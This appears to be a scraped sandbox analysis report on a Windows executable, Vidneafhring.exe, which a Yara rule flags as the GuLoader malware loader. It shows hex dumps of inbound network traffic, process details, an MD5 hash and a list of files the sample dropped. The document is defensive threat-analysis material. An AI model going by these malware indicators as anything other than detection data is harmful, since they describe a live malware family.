2025-02-19 19:37:27 UTC	1390	IN	Data Raw: 7d 82 55 8b b9 65 27 3d f8 4b 4d 86 82 bd 57 01 2d dd 77 0f c1 32 ed 95 3a b0 e6 99 bd 33 b1 ce b0 f7 b7 eb 11 88 bb cf 99 50 47 ee 86 1f 06 ae a4 1c ea 36 b8 a0 80 25 36 97 0a 0e 05 f1 75 d4 0f 2a 9d 1d b0 3a 37 c9 fd 1b 4e 81 74 fc 45 27 cf 9e 0e 77 87 94 be 59 7c 00 19 a7 b5 b1 5d e2 18 6b 44 3a 54 90 fd 8f d0 6a 9c 83 29 e1 e2 e9 7e 00 cc 0a 37 d8 5a 75 77 06 44 9b 46 a3 05 fc aa eb c2 ee 43 86 95 60 23 df 35 52 67 cf 1f 9a 3a 05 e7 e9 4e 46 3a 0f 64 bc 32 0a d1 8b d6 5f e5 df bf b4 1b 25 79 b2 f0 9f f2 e2 f8 93 a8 fe 7b ee 57 3d 08 44 60 ae d7 ac 40 e9 c5 f1 fe e9 4b a4 df 64 01 32 f8 35 d9 c4 ca 5d 0e 2e 45 4b 51 77 cb 43 66 1e 84 47 b6 e2 05 bf 98 e0 b4 2c 18 75 4f 79 1c 34 af ba 8e 83 cf 9e 8f 57 1c f5 93 a3 92 c0 0d aa 30 4a 0a 4e 67 f4 89 bd 8f Data Ascii: }Ue'=KMW-w2:3PG6%6u*:7NtE'wY\|]kD:Tj)~7ZuwDFC`#5Rg:NF:d2_%y{W=D`@Kd25].EKQwCfG,uOy4W0JNg
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: d4 38 45 e1 70 d9 0e 68 b0 71 f5 31 51 88 e8 73 6c fa f8 11 cc e8 b1 4f 82 5c 47 dd 60 f2 94 b6 bc 37 fd d6 e9 0a da 36 74 d3 a5 a5 d6 32 b4 74 2d cb 7f 15 1c 03 dd a8 c6 a9 50 48 a7 5d 5b 21 80 d6 e7 fd 61 f1 cb a6 ef 47 41 67 aa a5 8f b5 77 44 fa 64 0b dc 84 87 49 55 13 13 7c fd 95 be 92 6c 6b f8 6d f3 67 82 a1 1f 81 56 ec 5a 5e 39 d5 fb 6b 3e 2c 3c c8 0d 1b 0c 4b 62 ca 82 f5 e0 79 45 bb b0 0d b7 05 cd 6f ed c4 d6 40 13 61 23 9e 80 0b 56 dd 09 9c 4b 7b 65 c0 69 cf 85 3b 33 a7 e6 8c 50 c3 da 3d 8a 22 70 ae 66 1f 0d 17 83 ce cc cf 5f c0 9a b0 08 e7 ed f5 b3 2d 3f 99 9a 1e 6a 45 43 2c 5c ea 2d 2e 4a 61 f6 1b d8 04 95 d0 6c 69 00 99 ac 60 90 44 82 a0 a7 f3 05 53 c8 c6 07 96 8e 41 07 c1 3a 90 f7 95 df 8a fc 49 5f 5c c9 ed a6 db 1d 20 ed 8e 8b 53 eb dc c8 88 Data Ascii: 8Ephq1QslO\G`76t2t-PH][!aGAgwDdIU\|lkmgVZ^9k>,<KbyEo@a#VK{ei;3P="pf_-?jEC,\-.Jali`DSA:I_\ S
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: 4c 69 89 89 63 36 53 b3 2d 9e 11 d5 57 14 83 3e 7e a0 4c a5 b9 69 f3 3f b9 93 c9 db 01 12 b5 39 c2 75 55 22 5b b7 7c 16 d3 8d 71 dd 22 35 58 b9 92 7f 4a 7d 63 19 69 9a 47 24 9e 30 77 08 c9 8e 53 d4 f7 0e 8c d9 e4 28 35 33 85 d6 44 e7 46 3a 62 1e 54 71 3d 8f ae 2f 32 0a dd 69 d7 e5 4a 20 51 fb e8 de 88 e0 dd ac 34 62 14 8b 8f 80 ba 3c 25 c4 a8 30 52 46 fc f3 2e ae bd f7 66 b9 52 f6 e0 ca 25 19 3b 60 a4 82 4c 91 9d 8e 08 bb 9f fc 9c 21 e7 5e 85 cc b0 7b 5f d3 77 b1 4e 73 01 a9 5c 0a b0 6a 4a f7 44 e7 40 10 e3 c0 ae a3 1d dc 35 88 0b aa 6d f3 48 a7 df 5d 7b 7e 87 68 4a f0 76 cb e3 8c 3b 6f 98 eb a5 b0 f5 2f b2 6c 75 3b ee 07 c2 ec 79 ae f5 bc 4f e8 6d c9 29 d7 aa a5 f2 ae 8c b7 a0 66 81 97 c8 44 db b2 2a 96 04 cb ff 23 97 72 78 53 c8 40 9f 72 d2 65 81 31 d0 Data Ascii: Lic6S-W>~Li?9uU"[\|q"5XJ}ciG$0wS(53DF:bTq=/2iJ Q4b<%0RF.fR%;`L!^{_wNs\jJD@5mH]{~hJv;o/lu;yOm)fD*#rxS@re1
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: f7 c9 09 1f 9c 3d b7 be 68 30 b6 00 54 b6 86 6d 86 f9 e1 4b df e2 c9 f6 17 d9 74 9d 34 40 51 48 6f 23 04 f7 d7 46 55 84 62 0b fb 60 d8 ad e7 6c 80 ec cc e6 3c 37 08 d4 09 e1 0f f4 c3 b0 97 1c 28 6c 3a 50 43 fd 31 44 d7 12 49 ad ac 62 76 5a 0c c7 ce 3f c0 dd aa 06 91 2f 98 fc b6 df 43 6d 88 20 90 67 1c 41 d0 63 2d 2f d5 5e 02 13 ec 71 93 c7 69 47 f8 16 67 0b dd 63 be 6c 09 d4 90 84 59 de 1c e6 f7 0c c6 6d ed 96 7b 4b 3b ec 10 4c 6d 75 b4 d4 ba 54 74 81 72 a8 28 99 72 dc 88 c6 7d 53 de f0 69 b8 9d 12 d9 51 bf 8c d5 bf 4e cc 62 3d a2 6b 72 46 82 45 72 93 f9 b8 e6 8d 2c 48 4a 26 54 a2 02 b7 52 e2 c8 55 97 9c 47 08 0f 31 76 37 a0 4e 74 e7 8d 0b e5 86 a8 2d 58 89 e0 de e0 13 9a ae bc cc 0c b9 aa 70 fe b3 81 4b 4c 8b b1 eb d0 ff 93 13 16 79 61 32 34 4d 60 20 6c Data Ascii: =h0TmKt4@QHo#FUb`l<7(l:PC1DIbvZ?/Cm gAc-/^qiGgclYm{K;LmuTtr(r}SiQNb=krFEr,HJ&TRUG1v7Nt-XpKLya24M` l
2025-02-19 19:37:27 UTC	1390	IN	Data Raw: a5 90 1f 74 7e ef b5 82 87 73 6a c0 bb bf 15 99 46 fb 50 f6 18 d6 9e 9b cf f2 53 80 18 51 86 57 e7 5d aa 20 75 5d f6 03 a2 74 96 f4 f6 f7 65 9c 43 fb b2 8e 1b 59 ad 24 e0 1d 02 bb 04 58 fb 54 90 7f 88 cd 6f 08 5e 72 c1 f5 72 a8 35 4c c4 2c d2 f5 39 4c 81 bc 0b 08 0e 5e 00 db 55 e1 c8 1f 9c 4d f1 91 f9 b0 de ba 81 3d 35 59 ff a5 10 1c bd 5b 53 5d 8d 32 65 2c a8 8c 6d 7a 02 7b 09 b2 fc 70 6b d1 2e f1 e2 ff 5e 27 0c bb 8c 73 11 02 80 b8 7f b8 13 2d 12 6b d9 f5 56 30 92 a2 e3 3f 6e 9d f8 aa 6e ec 58 44 18 a6 03 bd d7 1a 1b 02 e6 51 ae 43 56 72 f4 d4 ce 4d 79 64 06 8a 1b 9f 0b 4f 0b 15 40 da d5 7f 4b 95 e4 b9 c6 81 25 ce ed 0b 29 85 34 cf 25 c0 31 74 e1 c0 7f 8a fa ce c6 b9 d5 56 4a 9d c6 0b b8 b6 b7 03 2c 90 a1 9d f1 b3 bc b5 a1 98 e9 9d 17 cf f4 d1 7c 87 05 Data Ascii: t~sjFPSQW] u]teCY$XTo^rr5L,9L^UM=5Y[S]2e,mz{pk.^'s-kV0?nnXDQCVrMydO@K%)4%1tVJ,\|

Target ID:	0
Start time:	14:35:27
Start date:	19/02/2025
Path:	C:\Users\user\Desktop\Vidneafhring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Vidneafhring.exe"
Imagebase:	0x400000
File size:	1'105'632 bytes
MD5 hash:	24C3013EE542B77EB416866A4DCDF66E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2561094326.00000000055D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	14:37:11
Start date:	19/02/2025
Path:	C:\Users\user\Desktop\Vidneafhring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Vidneafhring.exe"
Imagebase:	0x400000
File size:	1'105'632 bytes
MD5 hash:	24C3013EE542B77EB416866A4DCDF66E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Vidneafhring.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsi680F.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsi680F.tmp\System.dll

C:\Users\user\Videos\picotah.ini

C:\Users\user\resuscitant\Daasel\Biobrndsel28.mid

C:\Users\user\resuscitant\Daasel\Cofane.ini

C:\Users\user\resuscitant\Daasel\Distributionsorganisation73.unb

C:\Users\user\resuscitant\Daasel\Opholdstiden199.gan

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\Stereotypic.ini

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\Tilkomne.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\anthema.jpg

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\anthropomorphotheist.jpg

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\antistoffet.jpg

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\blaahattens.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\brunjernstens.jpg

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\coeternity.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\denudate.jpg

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\direktoratsafgrelsen.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\hoveddirektoriet.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\kemoterapeutiske.txt

C:\Users\user\resuscitant\Daasel\Savvrksarbejderes\necrectomy.txt

Windows Analysis Report
Vidneafhring.exe